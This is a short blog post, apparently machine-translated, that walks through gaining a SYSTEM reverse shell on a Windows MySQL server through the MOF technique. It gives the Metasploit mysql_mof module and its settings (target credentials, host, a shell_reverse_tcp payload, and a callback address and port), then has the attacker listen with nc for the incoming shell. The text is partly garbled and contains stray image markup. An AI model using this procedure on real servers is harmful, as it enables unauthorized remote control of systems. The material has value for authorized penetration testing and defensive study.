In view of the previous article http://z2ppp.blog.51cto.com/11186185/1975985 MySQL MOF right
Metasploit already have the use of code for this way, the principle or the same as the production of MOF files, only Metasploit can use to bounce technology, no additional users, provided that the other server allows access to the public network
Use exploit/windows/mysql/mysql_mofset password XXX//Set login MySQL password set username XXX//Set login to MySQL user set Rhost xxx Set the IP address to log on set Rport xxxx//Set MySQL port number set payload WINDOWS/SHELL_REVERSE_TCP//Bounce module used set lhost XXX//Bounce to The IP address set lport XXX//Bounce to the Port Show Options//settings complete, use this command to view the settings parameters exploit//execute
650) this.width=650; "Src=" Https://s3.51cto.com/oss/201710/25/c1a041031f20431a8c68e6761d7cae93.png-wh_500x0-wm_3 -wmp_4-s_3992907360.png "title=" Abc.png "alt=" C1a041031f20431a8c68e6761d7cae93.png-wh_ "/>
If no problem, that is exploit execution
Here we use NC to listen to the corresponding port number, we can receive the shell, usually the system permissions, because the MOF file is executed by the system
650) this.width=650; "Src=" Https://s3.51cto.com/oss/201710/25/768bd36cb1c1dd60b8f33e318a95dd24.png-wh_500x0-wm_3 -wmp_4-s_2554004714.png "title=" Bcd.png "alt=" 768bd36cb1c1dd60b8f33e318a95dd24.png-wh_ "/>
Where the error is, please correct it.
This article is from the "z2p blog" blog, make sure to keep this source http://z2ppp.blog.51cto.com/11186185/1975993
MySQL Mof+metasploit bounce Shell